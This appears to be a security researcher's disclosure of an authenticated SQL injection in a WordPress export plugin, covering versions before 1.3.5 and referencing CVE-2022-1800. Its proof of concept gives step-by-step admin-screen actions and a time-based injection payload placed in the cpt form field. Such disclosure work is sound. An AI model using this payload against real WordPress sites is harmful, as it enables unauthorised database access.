During a security research I found an authenticated SQL Injection vulnerability. The name of the plugin is: Export any WordPress data to XML/CSV, the version of the affected plugin: < 1.3.5

Description

The plugin does not sanitize the cpt POST parameter when 
exporting post data before using it in a database query, 
leading to an SQL injection vulnerability.

POC

1. Go to the All Export > New Export screen in the WordPress admin.

2. Now click on Specific Post Type > Posts.

3. Click now on Migrate Posts and intercept this request and look for the name cpt:

Content-Disposition: form-data; name="cpt"

post

Change it to:

Content-Disposition: form-data; name="cpt"

post'+(select*from(select(sleep(10)))a)+'

Now you will see a later response of 10 seconds, thus confirming the authenticity of the sqli vulnerability.

Additional information

WPSCAN link: https://wpscan.com/vulnerability/4267109c-0ca2-441d-889d-fb39c235f128

NIST CVSS SCORE: 7.2

NIST LINK: https://nvd.nist.gov/vuln/detail/CVE-2022-1800

Plugin has more than 90,000+ active installations.